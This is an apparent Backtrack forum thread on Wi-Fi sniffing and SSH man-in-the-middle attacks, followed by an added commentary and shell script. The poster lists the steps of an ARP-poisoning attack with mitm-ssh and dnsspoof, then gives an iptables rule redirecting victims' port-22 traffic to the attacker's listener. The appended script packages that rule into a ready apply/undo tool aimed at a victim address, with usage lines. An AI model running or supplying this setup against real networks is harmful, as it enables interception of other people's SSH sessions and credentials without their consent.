RT73 and dnsspoof
First of all, hello and thanks a lot to the Backtrack 4 staff for their awesome work.
I've been playing a lot with Backtrack lately. But if someone helps me with some of the questions I have, I'll be thankful.
I have a Conceptronic C54RU Wi-Fi USB stick (with a realtek RT73 chipset), and I was doing some wifi cracking when I noticed that I could not sniff data on channels 12, 13 and 14. Why is this? Other security distros let me sniff on those channels without a problem. I believe it has something to do with the drivers, but I really don't know. Also, how may I check the private ioctls of the USB stick? When I run iwpriv it tells me that neither wlan0 nor mon0 has private ioctls.
Another question I have is about MITM attacks. I performed SSL and SSH MITM attacks cleanly, but when it comes to SSH it seems that I have to use dnsspoof. Well, it works, but for some unknown reason it does not redirect subdomains. Let's say that I have done the following:
1) Installed MITM-SSH for SSHv2 man-in-the-middle attacks.
2) Echoed 1 to /proc/sys/net/ipv4/ip_forward.
3) ARP poisoned the victim.
4) Ran mitm-ssh, redirecting to some SSH server.
5) Ran dnsspoof -i eth0.
After doing that, if the victim starts an SSH connection to, for example, backtrack-linux.org, it would go through my machine first and it would be routed to the server that mitm-ssh points to. But if he connects to subdomain.backtrack-linux.org it would not. How do I solve this?
Thank you in advance.
Re: RT73 and dnsspoof
Never mind about my problems with SSH MITM, I figured out by myself that adding the following rule to iptables does the trick without the need for dnsspoof:
iptables -t nat -A PREROUTING -p tcp --destination-port 22 -j REDIRECT --to-ports 4444
(4444 is the port mitm-ssh is listening on locally.)
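The reply's rule works for subdomains because the NAT match is on TCP port 22 and not on any hostname: whatever name the victim resolved, the SYN arrives at the attacker box (its ARP-poisoned gateway) and gets rewritten to the local mitm-ssh listener. As posted, though, the rule diverts port 22 from every host whose traffic crosses the box. The script below is an added example, not code from the thread or from MITM-SSH; it wraps the same rule in apply/undo functions, restricts it to one interface and one victim address, and can print the commands instead of running them. The interface eth0, the constructed victim address 192.168.1.50 and the local port 4444 are assumptions taken from the poster's setup.

```shell
#!/bin/sh
# Added example, not code from the original thread. Transparent SSH
# redirect for an ARP-poisoned victim, built from the reply's iptables rule.
# Assumptions: victim traffic arrives on eth0, the victim is the constructed
# address 192.168.1.50, and mitm-ssh listens on localhost port 4444.
IFACE="${IFACE:-eth0}"
VICTIM="${VICTIM:-192.168.1.50}"
MITM_PORT="${MITM_PORT:-4444}"

# With DRY_RUN set, print each command instead of executing it, so the
# rules can be reviewed before the firewall is touched (no root needed).
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# $1 is -A (add) or -D (delete); the rule text is otherwise identical, so
# undo removes exactly what apply added. The match is on the victim's source
# address and destination TCP/22, never on a hostname, which is why it
# catches subdomain.backtrack-linux.org just as well as backtrack-linux.org.
# Locally generated traffic (mitm-ssh's own connection to the real server)
# goes through OUTPUT, not PREROUTING, so it is not looped back.
ssh_redirect_rule() {
    run iptables -t nat "$1" PREROUTING -i "$IFACE" -s "$VICTIM" \
        -p tcp --dport 22 -j REDIRECT --to-ports "$MITM_PORT"
}

apply_mitm() {
    # Forwarding must stay on: after ARP poisoning, everything else the
    # victim sends also passes through this box on its way to the gateway.
    run sysctl -w net.ipv4.ip_forward=1
    ssh_redirect_rule -A
}

undo_mitm() {
    ssh_redirect_rule -D
    run sysctl -w net.ipv4.ip_forward=0
}

# Usage: DRY_RUN=1 ./ssh_redirect.sh apply   (review the commands)
#        sudo ./ssh_redirect.sh apply        (install the rule)
#        sudo ./ssh_redirect.sh undo         (remove it again)
case "${1:-}" in
    apply) apply_mitm ;;
    undo)  undo_mitm ;;
esac
```

Start mitm-ssh on port 4444 before applying the rule; otherwise the victim's redirected SYN is refused and the SSH client reports a connection failure rather than falling through to the real server.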